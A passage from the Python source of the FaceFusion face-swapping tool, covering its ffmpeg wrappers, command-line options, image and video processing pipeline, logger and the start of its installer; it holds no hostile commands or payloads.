buffer_size) #type:ignore[attr-defined] if buffer_size > buffer_threshold: return unicode_buffer.value if buffer_threshold == 0: return None buffer_size = buffer_threshold File: facefusion/ffmpeg.py from typing import List, Optional import os import subprocess import filetype import facefusion.globals from facefusion import logger, process_manager from facefusion.typing import OutputVideoPreset, Fps, AudioBuffer from 
facefusion.filesystem import get_temp_frames_pattern, get_temp_file_path from facefusion.vision import restrict_video_fps def run_ffmpeg(args : List[str]) -> bool: commands = [ 'ffmpeg', '-hide_banner', '-loglevel', 'error' ] commands.extend(args) process = subprocess.Popen(commands, stderr = subprocess.PIPE, stdout = subprocess.PIPE) while process_manager.is_processing(): try: if facefusion.globals.log_level == 'debug': log_debug(process) return process.wait(timeout = 0.5) == 0 except subprocess.TimeoutExpired: continue return process.returncode == 0 def open_ffmpeg(args : List[str]) -> subprocess.Popen[bytes]: commands = [ 'ffmpeg', '-hide_banner', '-loglevel', 'quiet' ] commands.extend(args) return subprocess.Popen(commands, stdin = subprocess.PIPE, stdout = subprocess.PIPE) def log_debug(process : subprocess.Popen[bytes]) -> None: _, stderr = process.communicate() errors = stderr.decode().split(os.linesep) for error in errors: if error.strip(): logger.debug(error.strip(), __name__.upper()) def extract_frames(target_path : str, temp_video_resolution : str, temp_video_fps : Fps) -> bool: trim_frame_start = facefusion.globals.trim_frame_start trim_frame_end = facefusion.globals.trim_frame_end temp_frames_pattern = get_temp_frames_pattern(target_path, '%04d') commands = [ '-i', target_path, '-s', str(temp_video_resolution), '-q:v', '0' ] if trim_frame_start is not None and trim_frame_end is not None: commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ':end_frame=' + str(trim_frame_end) + ',fps=' + str(temp_video_fps) ]) elif trim_frame_start is not None: commands.extend([ '-vf', 'trim=start_frame=' + str(trim_frame_start) + ',fps=' + str(temp_video_fps) ]) elif trim_frame_end is not None: commands.extend([ '-vf', 'trim=end_frame=' + str(trim_frame_end) + ',fps=' + str(temp_video_fps) ]) else: commands.extend([ '-vf', 'fps=' + str(temp_video_fps) ]) commands.extend([ '-vsync', '0', temp_frames_pattern ]) return run_ffmpeg(commands) def merge_video(target_path : str, output_video_resolution : str, output_video_fps : Fps) -> bool: temp_video_fps = restrict_video_fps(target_path, output_video_fps) temp_file_path = get_temp_file_path(target_path) temp_frames_pattern = get_temp_frames_pattern(target_path, '%04d') commands = [ '-r', str(temp_video_fps), '-i', temp_frames_pattern, '-s', str(output_video_resolution), '-c:v', facefusion.globals.output_video_encoder ] if facefusion.globals.output_video_encoder in [ 'libx264', 'libx265' ]: output_video_compression = round(51 - (facefusion.globals.output_video_quality * 0.51)) commands.extend([ '-crf', str(output_video_compression), '-preset', facefusion.globals.output_video_preset ]) if facefusion.globals.output_video_encoder in [ 'libvpx-vp9' ]: output_video_compression = round(63 - (facefusion.globals.output_video_quality * 0.63)) commands.extend([ '-crf', str(output_video_compression) ]) if facefusion.globals.output_video_encoder in [ 'h264_nvenc', 'hevc_nvenc' ]: output_video_compression = round(51 - (facefusion.globals.output_video_quality * 0.51)) commands.extend([ '-cq', str(output_video_compression), '-preset', map_nvenc_preset(facefusion.globals.output_video_preset) ]) if facefusion.globals.output_video_encoder in [ 'h264_amf', 'hevc_amf' ]: output_video_compression = round(51 - (facefusion.globals.output_video_quality * 0.51)) commands.extend([ '-qp_i', str(output_video_compression), '-qp_p', str(output_video_compression), '-quality', map_amf_preset(facefusion.globals.output_video_preset) ]) commands.extend([ '-vf', 
'framerate=fps=' + str(output_video_fps), '-pix_fmt', 'yuv420p', '-colorspace', 'bt709', '-y', temp_file_path ]) return run_ffmpeg(commands) def copy_image(target_path : str, temp_image_resolution : str) -> bool: temp_file_path = get_temp_file_path(target_path) is_webp = filetype.guess_mime(target_path) == 'image/webp' temp_image_compression = 100 if is_webp else 0 commands = [ '-i', target_path, '-s', str(temp_image_resolution), '-q:v', str(temp_image_compression), '-y', temp_file_path ] return run_ffmpeg(commands) def finalize_image(target_path : str, output_path : str, output_image_resolution : str) -> bool: temp_file_path = get_temp_file_path(target_path) output_image_compression = round(31 - (facefusion.globals.output_image_quality * 0.31)) commands = [ '-i', temp_file_path, '-s', str(output_image_resolution), '-q:v', str(output_image_compression), '-y', output_path ] return run_ffmpeg(commands) def read_audio_buffer(target_path : str, sample_rate : int, channel_total : int) -> Optional[AudioBuffer]: commands = [ '-i', target_path, '-vn', '-f', 's16le', '-acodec', 'pcm_s16le', '-ar', str(sample_rate), '-ac', str(channel_total), '-'] process = open_ffmpeg(commands) audio_buffer, _ = process.communicate() if process.returncode == 0: return audio_buffer return None def restore_audio(target_path : str, output_path : str, output_video_fps : Fps) -> bool: trim_frame_start = facefusion.globals.trim_frame_start trim_frame_end = facefusion.globals.trim_frame_end temp_file_path = get_temp_file_path(target_path) commands = [ '-i', temp_file_path ] if trim_frame_start is not None: start_time = trim_frame_start / output_video_fps commands.extend([ '-ss', str(start_time) ]) if trim_frame_end is not None: end_time = trim_frame_end / output_video_fps commands.extend([ '-to', str(end_time) ]) commands.extend([ '-i', target_path, '-c', 'copy', '-map', '0:v:0', '-map', '1:a:0', '-shortest', '-y', output_path ]) return run_ffmpeg(commands) def replace_audio(target_path : str, audio_path : str, output_path : str) -> bool: temp_file_path = get_temp_file_path(target_path) commands = [ '-i', temp_file_path, '-i', audio_path, '-af', 'apad', '-shortest', '-y', output_path ] return run_ffmpeg(commands) def map_nvenc_preset(output_video_preset : OutputVideoPreset) -> Optional[str]: if output_video_preset in [ 'ultrafast', 'superfast', 'veryfast', 'faster', 'fast' ]: return 'fast' if output_video_preset == 'medium': return 'medium' if output_video_preset in [ 'slow', 'slower', 'veryslow' ]: return 'slow' return None def map_amf_preset(output_video_preset : OutputVideoPreset) -> Optional[str]: if output_video_preset in [ 'ultrafast', 'superfast', 'veryfast' ]: return 'speed' if output_video_preset in [ 'faster', 'fast', 'medium' ]: return 'balanced' if output_video_preset in [ 'slow', 'slower', 'veryslow' ]: return 'quality' return None File: facefusion/__init__.py File: facefusion/common_helper.py from typing import List, Any import platform def create_metavar(ranges : List[Any]) -> str: return '[' + str(ranges[0]) + '-' + str(ranges[-1]) + ']' def create_int_range(start : int, end : int, step : int) -> List[int]: int_range = [] current = start while current <= end: int_range.append(current) current += step return int_range def create_float_range(start : float, end : float, step : float) -> List[float]: float_range = [] current = start while current <= end: float_range.append(round(current, 2)) current = round(current + step, 2) return float_range def is_linux() -> bool: return to_lower_case(platform.system()) == 
'linux' def is_macos() -> bool: return to_lower_case(platform.system()) == 'darwin' def is_windows() -> bool: return to_lower_case(platform.system()) == 'windows' def to_lower_case(__string__ : Any) -> str: return str(__string__).lower() def get_first(__list__ : Any) -> Any: return next(iter(__list__), None) File: facefusion/core.py import os os.environ['OMP_NUM_THREADS'] = '1' import signal import sys import warnings import shutil import numpy import onnxruntime from time import sleep, time from argparse import ArgumentParser, HelpFormatter import facefusion.choices import facefusion.globals from facefusion.face_analyser import get_one_face, get_average_face from facefusion.face_store import get_reference_faces, append_reference_face from facefusion import face_analyser, face_masker, content_analyser, config, process_manager, metadata, logger, wording, voice_extractor from facefusion.content_analyser import analyse_image, analyse_video from facefusion.processors.frame.core import get_frame_processors_modules, load_frame_processor_module from facefusion.common_helper import create_metavar, get_first from facefusion.execution import encode_execution_providers, decode_execution_providers from facefusion.normalizer import normalize_output_path, normalize_padding, normalize_fps from facefusion.memory import limit_system_memory from facefusion.statistics import conditional_log_statistics from facefusion.download import conditional_download from facefusion.filesystem import get_temp_frame_paths, get_temp_file_path, create_temp, move_temp, clear_temp, is_image, is_video, filter_audio_paths, resolve_relative_path, list_directory from facefusion.ffmpeg import extract_frames, merge_video, copy_image, finalize_image, restore_audio, replace_audio from facefusion.vision import read_image, read_static_images, detect_image_resolution, restrict_video_fps, create_image_resolutions, get_video_frame, detect_video_resolution, detect_video_fps, restrict_video_resolution, restrict_image_resolution, create_video_resolutions, pack_resolution, unpack_resolution onnxruntime.set_default_logger_severity(3) warnings.filterwarnings('ignore', category = UserWarning, module = 'gradio') def cli() -> None: signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) program = ArgumentParser(formatter_class = lambda prog: HelpFormatter(prog, max_help_position = 200), add_help = False) # general program.add_argument('-c', '--config', help = wording.get('help.config'), dest = 'config_path', default = 'facefusion.ini') apply_config(program) program.add_argument('-s', '--source', help = wording.get('help.source'), action = 'append', dest = 'source_paths', default = config.get_str_list('general.source_paths')) program.add_argument('-t', '--target', help = wording.get('help.target'), dest = 'target_path', default = config.get_str_value('general.target_path')) program.add_argument('-o', '--output', help = wording.get('help.output'), dest = 'output_path', default = config.get_str_value('general.output_path')) program.add_argument('-v', '--version', version = metadata.get('name') + ' ' + metadata.get('version'), action = 'version') # misc group_misc = program.add_argument_group('misc') group_misc.add_argument('--force-download', help = wording.get('help.force_download'), action = 'store_true', default = config.get_bool_value('misc.force_download')) group_misc.add_argument('--skip-download', help = wording.get('help.skip_download'), action = 'store_true', default = config.get_bool_value('misc.skip_download')) 
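# most defaults in this parser are read from the config file selected via --config (see apply_config),
# so explicit CLI flags override the matching entries in facefusion.ini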
group_misc.add_argument('--headless', help = wording.get('help.headless'), action = 'store_true', default = config.get_bool_value('misc.headless')) group_misc.add_argument('--log-level', help = wording.get('help.log_level'), default = config.get_str_value('misc.log_level', 'info'), choices = logger.get_log_levels()) # execution execution_providers = encode_execution_providers(onnxruntime.get_available_providers()) group_execution = program.add_argument_group('execution') group_execution.add_argument('--execution-device-id', help = wording.get('help.execution_device_id'), default = config.get_str_value('execution.face_detector_size', '0')) group_execution.add_argument('--execution-providers', help = wording.get('help.execution_providers').format(choices = ', '.join(execution_providers)), default = config.get_str_list('execution.execution_providers', 'cpu'), choices = execution_providers, nargs = '+', metavar = 'EXECUTION_PROVIDERS') group_execution.add_argument('--execution-thread-count', help = wording.get('help.execution_thread_count'), type = int, default = config.get_int_value('execution.execution_thread_count', '4'), choices = facefusion.choices.execution_thread_count_range, metavar = create_metavar(facefusion.choices.execution_thread_count_range)) group_execution.add_argument('--execution-queue-count', help = wording.get('help.execution_queue_count'), type = int, default = config.get_int_value('execution.execution_queue_count', '1'), choices = facefusion.choices.execution_queue_count_range, metavar = create_metavar(facefusion.choices.execution_queue_count_range)) # memory group_memory = program.add_argument_group('memory') group_memory.add_argument('--video-memory-strategy', help = wording.get('help.video_memory_strategy'), default = config.get_str_value('memory.video_memory_strategy', 'strict'), choices = facefusion.choices.video_memory_strategies) group_memory.add_argument('--system-memory-limit', help = wording.get('help.system_memory_limit'), type = int, default = config.get_int_value('memory.system_memory_limit', '0'), choices = facefusion.choices.system_memory_limit_range, metavar = create_metavar(facefusion.choices.system_memory_limit_range)) # face analyser group_face_analyser = program.add_argument_group('face analyser') group_face_analyser.add_argument('--face-analyser-order', help = wording.get('help.face_analyser_order'), default = config.get_str_value('face_analyser.face_analyser_order', 'left-right'), choices = facefusion.choices.face_analyser_orders) group_face_analyser.add_argument('--face-analyser-age', help = wording.get('help.face_analyser_age'), default = config.get_str_value('face_analyser.face_analyser_age'), choices = facefusion.choices.face_analyser_ages) group_face_analyser.add_argument('--face-analyser-gender', help = wording.get('help.face_analyser_gender'), default = config.get_str_value('face_analyser.face_analyser_gender'), choices = facefusion.choices.face_analyser_genders) group_face_analyser.add_argument('--face-detector-model', help = wording.get('help.face_detector_model'), default = config.get_str_value('face_analyser.face_detector_model', 'yoloface'), choices = facefusion.choices.face_detector_set.keys()) group_face_analyser.add_argument('--face-detector-size', help = wording.get('help.face_detector_size'), default = config.get_str_value('face_analyser.face_detector_size', '640x640')) group_face_analyser.add_argument('--face-detector-score', help = wording.get('help.face_detector_score'), type = float, default = 
config.get_float_value('face_analyser.face_detector_score', '0.5'), choices = facefusion.choices.face_detector_score_range, metavar = create_metavar(facefusion.choices.face_detector_score_range)) group_face_analyser.add_argument('--face-landmarker-score', help = wording.get('help.face_landmarker_score'), type = float, default = config.get_float_value('face_analyser.face_landmarker_score', '0.5'), choices = facefusion.choices.face_landmarker_score_range, metavar = create_metavar(facefusion.choices.face_landmarker_score_range)) # face selector group_face_selector = program.add_argument_group('face selector') group_face_selector.add_argument('--face-selector-mode', help = wording.get('help.face_selector_mode'), default = config.get_str_value('face_selector.face_selector_mode', 'reference'), choices = facefusion.choices.face_selector_modes) group_face_selector.add_argument('--reference-face-position', help = wording.get('help.reference_face_position'), type = int, default = config.get_int_value('face_selector.reference_face_position', '0')) group_face_selector.add_argument('--reference-face-distance', help = wording.get('help.reference_face_distance'), type = float, default = config.get_float_value('face_selector.reference_face_distance', '0.6'), choices = facefusion.choices.reference_face_distance_range, metavar = create_metavar(facefusion.choices.reference_face_distance_range)) group_face_selector.add_argument('--reference-frame-number', help = wording.get('help.reference_frame_number'), type = int, default = config.get_int_value('face_selector.reference_frame_number', '0')) # face mask group_face_mask = program.add_argument_group('face mask') group_face_mask.add_argument('--face-mask-types', help = wording.get('help.face_mask_types').format(choices = ', '.join(facefusion.choices.face_mask_types)), default = config.get_str_list('face_mask.face_mask_types', 'box'), choices = facefusion.choices.face_mask_types, nargs = '+', metavar = 'FACE_MASK_TYPES') group_face_mask.add_argument('--face-mask-blur', help = wording.get('help.face_mask_blur'), type = float, default = config.get_float_value('face_mask.face_mask_blur', '0.3'), choices = facefusion.choices.face_mask_blur_range, metavar = create_metavar(facefusion.choices.face_mask_blur_range)) group_face_mask.add_argument('--face-mask-padding', help = wording.get('help.face_mask_padding'), type = int, default = config.get_int_list('face_mask.face_mask_padding', '0 0 0 0'), nargs = '+') group_face_mask.add_argument('--face-mask-regions', help = wording.get('help.face_mask_regions').format(choices = ', '.join(facefusion.choices.face_mask_regions)), default = config.get_str_list('face_mask.face_mask_regions', ' '.join(facefusion.choices.face_mask_regions)), choices = facefusion.choices.face_mask_regions, nargs = '+', metavar = 'FACE_MASK_REGIONS') # frame extraction group_frame_extraction = program.add_argument_group('frame extraction') group_frame_extraction.add_argument('--trim-frame-start', help = wording.get('help.trim_frame_start'), type = int, default = facefusion.config.get_int_value('frame_extraction.trim_frame_start')) group_frame_extraction.add_argument('--trim-frame-end', help = wording.get('help.trim_frame_end'), type = int, default = facefusion.config.get_int_value('frame_extraction.trim_frame_end')) group_frame_extraction.add_argument('--temp-frame-format', help = wording.get('help.temp_frame_format'), default = config.get_str_value('frame_extraction.temp_frame_format', 'png'), choices = facefusion.choices.temp_frame_formats) 
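# --keep-temp makes clear_temp leave the extracted frames in place under the directory
# returned by filesystem.get_temp_directory_path instead of deleting them after processing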
group_frame_extraction.add_argument('--keep-temp', help = wording.get('help.keep_temp'), action = 'store_true', default = config.get_bool_value('frame_extraction.keep_temp')) # output creation group_output_creation = program.add_argument_group('output creation') group_output_creation.add_argument('--output-image-quality', help = wording.get('help.output_image_quality'), type = int, default = config.get_int_value('output_creation.output_image_quality', '80'), choices = facefusion.choices.output_image_quality_range, metavar = create_metavar(facefusion.choices.output_image_quality_range)) group_output_creation.add_argument('--output-image-resolution', help = wording.get('help.output_image_resolution'), default = config.get_str_value('output_creation.output_image_resolution')) group_output_creation.add_argument('--output-video-encoder', help = wording.get('help.output_video_encoder'), default = config.get_str_value('output_creation.output_video_encoder', 'libx264'), choices = facefusion.choices.output_video_encoders) group_output_creation.add_argument('--output-video-preset', help = wording.get('help.output_video_preset'), default = config.get_str_value('output_creation.output_video_preset', 'veryfast'), choices = facefusion.choices.output_video_presets) group_output_creation.add_argument('--output-video-quality', help = wording.get('help.output_video_quality'), type = int, default = config.get_int_value('output_creation.output_video_quality', '80'), choices = facefusion.choices.output_video_quality_range, metavar = create_metavar(facefusion.choices.output_video_quality_range)) group_output_creation.add_argument('--output-video-resolution', help = wording.get('help.output_video_resolution'), default = config.get_str_value('output_creation.output_video_resolution')) group_output_creation.add_argument('--output-video-fps', help = wording.get('help.output_video_fps'), type = float, default = config.get_str_value('output_creation.output_video_fps')) group_output_creation.add_argument('--skip-audio', help = wording.get('help.skip_audio'), action = 'store_true', default = config.get_bool_value('output_creation.skip_audio')) # frame processors available_frame_processors = list_directory('facefusion/processors/frame/modules') program = ArgumentParser(parents = [ program ], formatter_class = program.formatter_class, add_help = True) group_frame_processors = program.add_argument_group('frame processors') group_frame_processors.add_argument('--frame-processors', help = wording.get('help.frame_processors').format(choices = ', '.join(available_frame_processors)), default = config.get_str_list('frame_processors.frame_processors', 'face_swapper'), nargs = '+') for frame_processor in available_frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) frame_processor_module.register_args(group_frame_processors) # uis available_ui_layouts = list_directory('facefusion/uis/layouts') group_uis = program.add_argument_group('uis') group_uis.add_argument('--open-browser', help=wording.get('help.open_browser'), action = 'store_true', default = config.get_bool_value('uis.open_browser')) group_uis.add_argument('--ui-layouts', help = wording.get('help.ui_layouts').format(choices = ', '.join(available_ui_layouts)), default = config.get_str_list('uis.ui_layouts', 'default'), nargs = '+') run(program) def apply_config(program : ArgumentParser) -> None: known_args = program.parse_known_args() facefusion.globals.config_path = get_first(known_args).config_path def validate_args(program : 
ArgumentParser) -> None: try: for action in program._actions: if action.default: if isinstance(action.default, list): for default in action.default: program._check_value(action, default) else: program._check_value(action, action.default) except Exception as exception: program.error(str(exception)) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() # general facefusion.globals.source_paths = args.source_paths facefusion.globals.target_path = args.target_path facefusion.globals.output_path = args.output_path # misc facefusion.globals.force_download = args.force_download facefusion.globals.skip_download = args.skip_download facefusion.globals.headless = args.headless facefusion.globals.log_level = args.log_level # execution facefusion.globals.execution_device_id = args.execution_device_id facefusion.globals.execution_providers = decode_execution_providers(args.execution_providers) facefusion.globals.execution_thread_count = args.execution_thread_count facefusion.globals.execution_queue_count = args.execution_queue_count # memory facefusion.globals.video_memory_strategy = args.video_memory_strategy facefusion.globals.system_memory_limit = args.system_memory_limit # face analyser facefusion.globals.face_analyser_order = args.face_analyser_order facefusion.globals.face_analyser_age = args.face_analyser_age facefusion.globals.face_analyser_gender = args.face_analyser_gender facefusion.globals.face_detector_model = args.face_detector_model if args.face_detector_size in facefusion.choices.face_detector_set[args.face_detector_model]: facefusion.globals.face_detector_size = args.face_detector_size else: facefusion.globals.face_detector_size = '640x640' facefusion.globals.face_detector_score = args.face_detector_score facefusion.globals.face_landmarker_score = args.face_landmarker_score # face selector facefusion.globals.face_selector_mode = args.face_selector_mode facefusion.globals.reference_face_position = args.reference_face_position facefusion.globals.reference_face_distance = args.reference_face_distance facefusion.globals.reference_frame_number = args.reference_frame_number # face mask facefusion.globals.face_mask_types = args.face_mask_types facefusion.globals.face_mask_blur = args.face_mask_blur facefusion.globals.face_mask_padding = normalize_padding(args.face_mask_padding) facefusion.globals.face_mask_regions = args.face_mask_regions # frame extraction facefusion.globals.trim_frame_start = args.trim_frame_start facefusion.globals.trim_frame_end = args.trim_frame_end facefusion.globals.temp_frame_format = args.temp_frame_format facefusion.globals.keep_temp = args.keep_temp # output creation facefusion.globals.output_image_quality = args.output_image_quality if is_image(args.target_path): output_image_resolution = detect_image_resolution(args.target_path) output_image_resolutions = create_image_resolutions(output_image_resolution) if args.output_image_resolution in output_image_resolutions: facefusion.globals.output_image_resolution = args.output_image_resolution else: facefusion.globals.output_image_resolution = pack_resolution(output_image_resolution) facefusion.globals.output_video_encoder = args.output_video_encoder facefusion.globals.output_video_preset = args.output_video_preset facefusion.globals.output_video_quality = args.output_video_quality if is_video(args.target_path): output_video_resolution = detect_video_resolution(args.target_path) output_video_resolutions = create_video_resolutions(output_video_resolution) if args.output_video_resolution in 
output_video_resolutions: facefusion.globals.output_video_resolution = args.output_video_resolution else: facefusion.globals.output_video_resolution = pack_resolution(output_video_resolution) if args.output_video_fps or is_video(args.target_path): facefusion.globals.output_video_fps = normalize_fps(args.output_video_fps) or detect_video_fps(args.target_path) facefusion.globals.skip_audio = args.skip_audio # frame processors available_frame_processors = list_directory('facefusion/processors/frame/modules') facefusion.globals.frame_processors = args.frame_processors for frame_processor in available_frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) frame_processor_module.apply_args(program) # uis facefusion.globals.open_browser = args.open_browser facefusion.globals.ui_layouts = args.ui_layouts def run(program : ArgumentParser) -> None: validate_args(program) apply_args(program) logger.init(facefusion.globals.log_level) if facefusion.globals.system_memory_limit > 0: limit_system_memory(facefusion.globals.system_memory_limit) if facefusion.globals.force_download: force_download() return if not pre_check() or not content_analyser.pre_check() or not face_analyser.pre_check() or not face_masker.pre_check() or not voice_extractor.pre_check(): return for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): if not frame_processor_module.pre_check(): return if facefusion.globals.headless: conditional_process() else: import facefusion.uis.core as ui for ui_layout in ui.get_ui_layouts_modules(facefusion.globals.ui_layouts): if not ui_layout.pre_check(): return ui.launch() def destroy() -> None: process_manager.stop() while process_manager.is_processing(): sleep(0.5) if facefusion.globals.target_path: clear_temp(facefusion.globals.target_path) sys.exit(0) def pre_check() -> bool: if sys.version_info < (3, 9): logger.error(wording.get('python_not_supported').format(version = '3.9'), __name__.upper()) return False if not shutil.which('ffmpeg'): logger.error(wording.get('ffmpeg_not_installed'), __name__.upper()) return False return True def conditional_process() -> None: start_time = time() for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): while not frame_processor_module.post_check(): logger.disable() sleep(0.5) logger.enable() if not frame_processor_module.pre_process('output'): return conditional_append_reference_faces() if is_image(facefusion.globals.target_path): process_image(start_time) if is_video(facefusion.globals.target_path): process_video(start_time) def conditional_append_reference_faces() -> None: if 'reference' in facefusion.globals.face_selector_mode and not get_reference_faces(): source_frames = read_static_images(facefusion.globals.source_paths) source_face = get_average_face(source_frames) if is_video(facefusion.globals.target_path): reference_frame = get_video_frame(facefusion.globals.target_path, facefusion.globals.reference_frame_number) else: reference_frame = read_image(facefusion.globals.target_path) reference_face = get_one_face(reference_frame, facefusion.globals.reference_face_position) append_reference_face('origin', reference_face) if source_face and reference_face: for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): abstract_reference_frame = frame_processor_module.get_reference_frame(source_face, reference_face, reference_frame) if numpy.any(abstract_reference_frame): reference_frame = 
abstract_reference_frame reference_face = get_one_face(reference_frame, facefusion.globals.reference_face_position) append_reference_face(frame_processor_module.__name__, reference_face) def force_download() -> None: download_directory_path = resolve_relative_path('../.assets/models') available_frame_processors = list_directory('facefusion/processors/frame/modules') model_list =\ [ content_analyser.MODELS, face_analyser.MODELS, face_masker.MODELS, voice_extractor.MODELS ] for frame_processor_module in get_frame_processors_modules(available_frame_processors): if hasattr(frame_processor_module, 'MODELS'): model_list.append(frame_processor_module.MODELS) model_urls = [ models[model].get('url') for models in model_list for model in models ] conditional_download(download_directory_path, model_urls) def process_image(start_time : float) -> None: normed_output_path = normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path) if analyse_image(facefusion.globals.target_path): return # clear temp logger.debug(wording.get('clearing_temp'), __name__.upper()) clear_temp(facefusion.globals.target_path) # create temp logger.debug(wording.get('creating_temp'), __name__.upper()) create_temp(facefusion.globals.target_path) # copy image process_manager.start() temp_image_resolution = pack_resolution(restrict_image_resolution(facefusion.globals.target_path, unpack_resolution(facefusion.globals.output_image_resolution))) logger.info(wording.get('copying_image').format(resolution = temp_image_resolution), __name__.upper()) if copy_image(facefusion.globals.target_path, temp_image_resolution): logger.debug(wording.get('copying_image_succeed'), __name__.upper()) else: logger.error(wording.get('copying_image_failed'), __name__.upper()) return # process image temp_file_path = get_temp_file_path(facefusion.globals.target_path) for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): logger.info(wording.get('processing'), frame_processor_module.NAME) frame_processor_module.process_image(facefusion.globals.source_paths, temp_file_path, temp_file_path) frame_processor_module.post_process() if is_process_stopping(): return # finalize image logger.info(wording.get('finalizing_image').format(resolution = facefusion.globals.output_image_resolution), __name__.upper()) if finalize_image(facefusion.globals.target_path, normed_output_path, facefusion.globals.output_image_resolution): logger.debug(wording.get('finalizing_image_succeed'), __name__.upper()) else: logger.warn(wording.get('finalizing_image_skipped'), __name__.upper()) # clear temp logger.debug(wording.get('clearing_temp'), __name__.upper()) clear_temp(facefusion.globals.target_path) # validate image if is_image(normed_output_path): seconds = '{:.2f}'.format((time() - start_time) % 60) logger.info(wording.get('processing_image_succeed').format(seconds = seconds), __name__.upper()) conditional_log_statistics() else: logger.error(wording.get('processing_image_failed'), __name__.upper()) process_manager.end() def process_video(start_time : float) -> None: normed_output_path = normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path) if analyse_video(facefusion.globals.target_path, facefusion.globals.trim_frame_start, facefusion.globals.trim_frame_end): return # clear temp logger.debug(wording.get('clearing_temp'), __name__.upper()) clear_temp(facefusion.globals.target_path) # create temp logger.debug(wording.get('creating_temp'), __name__.upper()) 
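# --- Illustrative aside (not part of facefusion/core.py) ---------------------
# A standalone sketch of how force_download() above flattens several MODELS
# dictionaries into one flat list of download URLs. The entries below are
# made-up placeholders; the real MODELS tables live in the modules further
# down in this dump.
example_model_list =\
[
    { 'voice_extractor': { 'url': 'https://example.invalid/voice_extractor.onnx' } },
    { 'face_occluder': { 'url': 'https://example.invalid/face_occluder.onnx' } }
]
example_model_urls = [ models[model].get('url') for models in example_model_list for model in models ]
print(example_model_urls)
# ------------------------------------------------------------------------------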
create_temp(facefusion.globals.target_path) # extract frames process_manager.start() temp_video_resolution = pack_resolution(restrict_video_resolution(facefusion.globals.target_path, unpack_resolution(facefusion.globals.output_video_resolution))) temp_video_fps = restrict_video_fps(facefusion.globals.target_path, facefusion.globals.output_video_fps) logger.info(wording.get('extracting_frames').format(resolution = temp_video_resolution, fps = temp_video_fps), __name__.upper()) if extract_frames(facefusion.globals.target_path, temp_video_resolution, temp_video_fps): logger.debug(wording.get('extracting_frames_succeed'), __name__.upper()) else: if is_process_stopping(): return logger.error(wording.get('extracting_frames_failed'), __name__.upper()) return # process frames temp_frame_paths = get_temp_frame_paths(facefusion.globals.target_path) if temp_frame_paths: for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): logger.info(wording.get('processing'), frame_processor_module.NAME) frame_processor_module.process_video(facefusion.globals.source_paths, temp_frame_paths) frame_processor_module.post_process() if is_process_stopping(): return else: logger.error(wording.get('temp_frames_not_found'), __name__.upper()) return # merge video logger.info(wording.get('merging_video').format(resolution = facefusion.globals.output_video_resolution, fps = facefusion.globals.output_video_fps), __name__.upper()) if merge_video(facefusion.globals.target_path, facefusion.globals.output_video_resolution, facefusion.globals.output_video_fps): logger.debug(wording.get('merging_video_succeed'), __name__.upper()) else: if is_process_stopping(): return logger.error(wording.get('merging_video_failed'), __name__.upper()) return # handle audio if facefusion.globals.skip_audio: logger.info(wording.get('skipping_audio'), __name__.upper()) move_temp(facefusion.globals.target_path, normed_output_path) else: if 'lip_syncer' in facefusion.globals.frame_processors: source_audio_path = get_first(filter_audio_paths(facefusion.globals.source_paths)) if source_audio_path and replace_audio(facefusion.globals.target_path, source_audio_path, normed_output_path): logger.debug(wording.get('restoring_audio_succeed'), __name__.upper()) else: if is_process_stopping(): return logger.warn(wording.get('restoring_audio_skipped'), __name__.upper()) move_temp(facefusion.globals.target_path, normed_output_path) else: if restore_audio(facefusion.globals.target_path, normed_output_path, facefusion.globals.output_video_fps): logger.debug(wording.get('restoring_audio_succeed'), __name__.upper()) else: if is_process_stopping(): return logger.warn(wording.get('restoring_audio_skipped'), __name__.upper()) move_temp(facefusion.globals.target_path, normed_output_path) # clear temp logger.debug(wording.get('clearing_temp'), __name__.upper()) clear_temp(facefusion.globals.target_path) # validate video if is_video(normed_output_path): seconds = '{:.2f}'.format((time() - start_time)) logger.info(wording.get('processing_video_succeed').format(seconds = seconds), __name__.upper()) conditional_log_statistics() else: logger.error(wording.get('processing_video_failed'), __name__.upper()) process_manager.end() def is_process_stopping() -> bool: if process_manager.is_stopping(): process_manager.end() logger.info(wording.get('processing_stopped'), __name__.upper()) return process_manager.is_pending() File: facefusion/logger.py from typing import Dict from logging import basicConfig, getLogger, Logger, DEBUG, INFO, WARNING, 
ERROR from facefusion.typing import LogLevel def init(log_level : LogLevel) -> None: basicConfig(format = None) get_package_logger().setLevel(get_log_levels()[log_level]) def get_package_logger() -> Logger: return getLogger('facefusion') def debug(message : str, scope : str) -> None: get_package_logger().debug('[' + scope + '] ' + message) def info(message : str, scope : str) -> None: get_package_logger().info('[' + scope + '] ' + message) def warn(message : str, scope : str) -> None: get_package_logger().warning('[' + scope + '] ' + message) def error(message : str, scope : str) -> None: get_package_logger().error('[' + scope + '] ' + message) def enable() -> None: get_package_logger().disabled = False def disable() -> None: get_package_logger().disabled = True def get_log_levels() -> Dict[LogLevel, int]: return\ { 'error': ERROR, 'warn': WARNING, 'info': INFO, 'debug': DEBUG } File: facefusion/installer.py from typing import Dict, Tuple import sys import os import tempfile import subprocess import inquirer from argparse import ArgumentParser, HelpFormatter from facefusion import metadata, wording from facefusion.common_helper import is_linux, is_macos, is_windows if is_macos(): os.environ['SYSTEM_VERSION_COMPAT'] = '0' ONNXRUNTIMES : Dict[str, Tuple[str, str]] = {} if is_macos(): ONNXRUNTIMES['default'] = ('onnxruntime', '1.17.3') else: ONNXRUNTIMES['default'] = ('onnxruntime', '1.17.3') ONNXRUNTIMES['cuda-12.2'] = ('onnxruntime-gpu', '1.17.1') ONNXRUNTIMES['cuda-11.8'] = ('onnxruntime-gpu', '1.17.1') ONNXRUNTIMES['openvino'] = ('onnxruntime-openvino', '1.15.0') if is_linux(): ONNXRUNTIMES['rocm-5.4.2'] = ('onnxruntime-rocm', '1.16.3') ONNXRUNTIMES['rocm-5.6'] = ('onnxruntime-rocm', '1.16.3') if is_windows(): ONNXRUNTIMES['directml'] = ('onnxruntime-directml', '1.17.3') def cli() -> None: program = ArgumentParser(formatter_class = lambda prog: 